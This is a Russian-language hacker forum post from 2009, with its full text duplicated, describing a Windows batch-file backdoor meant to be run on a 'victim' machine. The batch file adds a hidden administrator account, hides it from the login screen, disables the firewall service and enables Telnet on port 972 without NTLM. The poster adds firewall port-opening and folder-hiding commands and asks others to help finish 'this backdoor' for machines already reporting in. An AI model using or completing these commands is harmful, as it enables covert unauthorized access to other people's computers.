Vlad&slav
19.06.2009, 00:35
Телнет - сетевой протокол для работы в удаленной системе в терминальном
режиме(т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
позволяющая нам подключаться к удаленным компьютерам.
Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у жертвы. Делать это можно с помощью команд cmd
Для этого напишим батник :
chcp 1251
net user SUPPORT_388945a0 /delete
net user qwerty 123 /add
net localgroup Администраторы qwerty /add
net localgroup Administrators qwerty /add
net localgroup Пользователи SUPPORT_388945a0 /del
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "qwerty" /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Всё вроде верно, но перестало работать :confused:
http://s44.radikal.ru/i103/0906/7a/aa80d3053908.jpg
в том что комп включен уверен на 100%
можт кто блочит, но не все же компы махом 0_o
и адреса приходят
порыскаав по нету нашол команду netsh firewall
netsh firewall add portopening TCP 972 System
или
Netsh firewall add portopening protocol=tcp port=972 mode=enable scope=all
незнаю как правильно и многое ли ето даст
+ хочется добавить скрытость на папку с юзером в документс анд сеттингс
помоему команда
attrib +s +h C:\Documents and Settings\qwerty >nul
должна сработать
Отчётов уже огромный список а войти не могу =(
кто нибудь может помоч мне дописать этого бакдора до конца, учтя все мелочи стукните в аску 2218982
зарание спасибо
режиме(т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
позволяющая нам подключаться к удаленным компьютерам.
Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у жертвы. Делать это можно с помощью команд cmd
Для этого напишим батник :
chcp 1251
net user SUPPORT_388945a0 /delete
net user qwerty 123 /add
net localgroup Администраторы qwerty /add
net localgroup Administrators qwerty /add
net localgroup Пользователи SUPPORT_388945a0 /del
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "qwerty" /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Всё вроде верно, но перестало работать :confused:
http://s44.radikal.ru/i103/0906/7a/aa80d3053908.jpg
в том что комп включен уверен на 100%
можт кто блочит, но не все же компы махом 0_o
и адреса приходят
порыскаав по нету нашол команду netsh firewall
netsh firewall add portopening TCP 972 System
или
Netsh firewall add portopening protocol=tcp port=972 mode=enable scope=all
незнаю как правильно и многое ли ето даст
+ хочется добавить скрытость на папку с юзером в документс анд сеттингс
помоему команда
attrib +s +h C:\Documents and Settings\qwerty >nul
должна сработать
Отчётов уже огромный список а войти не могу =(
кто нибудь может помоч мне дописать этого бакдора до конца, учтя все мелочи стукните в аску 2218982
зарание спасибо